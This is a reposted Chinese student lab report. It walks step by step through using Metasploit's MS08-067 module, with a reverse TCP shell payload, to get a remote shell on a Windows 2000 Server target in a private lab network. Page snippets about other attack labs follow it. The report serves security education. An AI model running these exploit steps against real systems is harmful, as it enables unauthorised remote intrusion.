2017-2018-2 20179205《网络攻防技术与实践》Windows攻击实验

最新推荐文章于 2022-03-08 10:03:50 发布
最新推荐文章于 2022-03-08 10:03:50 发布
阅读量169 收藏
点赞数
文章标签: shell 操作系统
原文链接:http://www.cnblogs.com/wyz-1995/p/8875098.html
版权

Windows攻击实验

实验描述:

使用Metaspoit攻击MS08-067,提交正确得到远程shell过程的截图(不少于五张)。

MS08-067漏洞介绍

  MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

实验工具

本次实验使用的攻击机是kali,靶机是Win2kServer

攻击机:192.168.92.147
靶机:192.168.92.148

实验步骤:

1.首先攻击机和靶机互ping,在kali终端开启msfconsole

1249685-20180418145817526-601014704.png

1249685-20180418145833143-1228771269.png

2.查找是否存在ms08_067漏洞,查看返回信息,会显示出找到的渗透模块

1249685-20180418150017608-1061365467.png

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入利用该漏洞模块。接下来可输入一些命令来显示一些信息,如:

输入show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp

1249685-20180418150419298-820275409.png

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

1249685-20180418150757286-910839919.png

输入show targets会显示出可以被攻击的靶机的操作系统型号

1249685-20180418150558170-503678451.png

4.输入show options显示我们需要在攻击前需要设置的数据

1249685-20180418150855085-936061546.png

5.设置攻击机和靶机地址,并使用命令show options再次查看payload状态

输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.147;
输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.148;

1249685-20180418151346637-655833702.png

6.输入命令exploit开始攻击,下图为正常攻击成功结果

1249685-20180418151450482-1888516365.png

7.在攻击机和靶机中分别查看IP地址,输入ipconfig/all,发现结果一致

1249685-20180418151709966-1902932104.png

1249685-20180418151724117-1750163514.png

8.输入“netstat -a”命令,可以查看靶机开启了哪些端口

1249685-20180418151843602-1205996841.png

9.输入“netstat -n”命令, 查看靶机端口的网络连接情况

1249685-20180418151917454-1674506016.png

转载于:https://www.cnblogs.com/wyz-1995/p/8875098.html

weixin_30776863
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络攻防实验】三:Windows7操作系统安全
野原新之助
03-30 3242
文章目录实验目的实验环境实验步骤1、账户与口令2、审核与日志3、安全模板扩展知识 实验目的 了解Windows账户与密码的安全策略设置,掌握用户和用户组的权限管理、审核,以及日志的启用,并学会使用安全模版来分析配置计算机。 实验环境 Windows7 操作系统 实验步骤 1、账户与口令 (1)删除不再使用的账户,禁用Guest账户 进入“控制面板”→“用户账户和家庭安全”→“用户账户”→...
【NSA黑客工具包】Windows 0day验证实验
wodafa的博客
05-04 3168
面对这种指哪儿打哪儿的神级漏洞,锦行科技CTO.Jannock、长亭科技.Monster、腾讯玄武实验室.TK、腾讯湛泸实验室.yuange等国内相关安全专家也给出了一些想法和解决方案。微软MSRC也发布了一则风险评估公告,报告中指出微软MSRC分析了由Shadow Brokers公开提供 的大量漏洞,大多数漏洞都已经被修补。剩余的漏洞,也被验证在Windows7、Windows近期版本、Exchange2010以及Exchange较新版本中没有得到复现,不过微软MSRC强烈建议仍在使用这些产品先前版本的用
如何使用ping命令检查网络情况
Gao068465的博客
03-08 1万+
一般情况下,用户可以通过使用一系列ping命令来查找问题出在什么地方,使用ping命令大致可以从以下几个角度检查: 主机自身网络 中间网络 检查DNS 目标网络
网络攻防实验之木马攻击实验
热门推荐
hxxjxw的博客
07-09 1万+
这个实验网络攻防课程实验中的一个,以冰河木马为例,操作系统是XP,对于现在的安全意义不大了,但是可以看一下多年前流行的冰河木马的功能和操作。 一、实验目的和要求 (1)通过对木马的练习,使读者理解和掌握木马传播和运行的机制; (2)通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。 实验原理和实验环境 实验...
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 4110
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
此外,通过亲自动手实践,加深了对网络攻防技术的理解,认识到网络安全的重要性,以及持续学习和改进防护策略的必要性。 实验过程记录: 在整个实验过程中,我们注意到捕获的数据包包含了登录时的用户名和密码尝试...
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
ARP欺骗是一种网络攻击技术,它通过篡改网络层与数据链路层之间的映射关系,使得数据包被重定向到攻击者的设备上,从而实现监听、拦截甚至篡改网络通信的目的。本实验旨在帮助学生深入理解ARP欺骗的原理,掌握其实施...
天津理工大学信息安全网络攻击预防与技术实验4
最新发布
11-28
实验四:综合实验——木马病毒的预防与技术 实验目的: 1. 了解和认识木马病毒的概念,理解其潜在的危害,增强安全意识。 2. 深入探讨木马病毒的特征和运行机制,为后续的防御策略打下基础。 3. 掌握木马病毒的技术...
网络攻防实验
09-04
实验一 网络联通嗅探实验实验 主机信息探测实验实验三 路由信息探测实验实验四 域名信息探测实验实验五 安全漏洞探测实验实验六 交换式网络嗅探实验实验Windows本地密码破解(lc)实验实验八 ARP_...
网络攻防实验指导书,实验一平台搭建 实验网络信息收集 实验三TCP/IP网络协议攻击 实验四系统攻防实验 实验
05-15
网络攻防实验指导书】是一份针对信息安全或网络空间安全专业学生的实验教材,旨在通过一系列实验帮助学生理解和掌握网络攻防技术实验内容涵盖了网络平台搭建、信息收集、TCP/IP协议攻击以及系统攻防等多个方面,...
无文件渗透实验
一个码农的笔记
03-09 4331
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
2018-2019-2 20189206 《网络攻防实践》 第七周作业
weixin_30321709的博客
04-14 191
2018-2019-2 20189206 《网络攻防实践》 第七周作业 课本学习 Windows操作系统安全攻防 Windows操作系统的基本结构 Windows采用宏内核模式来进行架构,大量的内核模块与设备驱动程序共享内核态内存空间,为了避免内核模块遭受攻击要求所有请求安装进入内核执行的设备驱动程序都需要经过数字签名。 Windows操作系统的基本结构如图所示,分为: 运行于处理器特权模...
网络攻防实验】四:Windows安全策略与安全模板
野原新之助
04-01 2572
安全模板是一种ASCII文本文件,它定义了本地权限、安全配置、本地组成员、服务、文件和目录授权、注册表授权等方面的信息。
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067(Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3422
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
永恒之蓝——windows server 2003 漏洞复现
Stephen Wolf
11-12 5169
一、永恒之蓝简述: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在...
网络攻防_实验
weixin_34292287的博客
03-17 2272
转载于:https://www.cnblogs.com/clljs/p/10549218.html...
2017-2018-2 20179205网络攻防技术实践》第七周作业
weixin_30588907的博客
04-22 765
网络攻防技术实践》第七周学习总结 视频学习总结 一、漏洞利用之检索与利用 漏洞利用工具集 1.Exploit Database->searchsploit 2.pattern create 测试漏洞 armitage 结合MSF进行利用 3.jboss-autopwn-linux->win 专门针对Jboss的漏洞利用工具 4.ikat 自动化开启,等待目标访问中招...
#20155235 《网络攻防实验 后门原理与实践
weixin_30236595的博客
04-03 254
20155235 《网络攻防实验 后门原理与实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或soca...
福州大学网络攻防实验:TCP RST攻击与防范实践
福州大学信息安全专业的网络攻防实验是该专业学生必做的实践课程,旨在通过实际操作深入了解TCP协议的工作原理和潜在的安全风险。本实验聚焦于TCP协议中的RST(Reset)攻击与防范。RST攻击利用TCP协议的复位功能,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值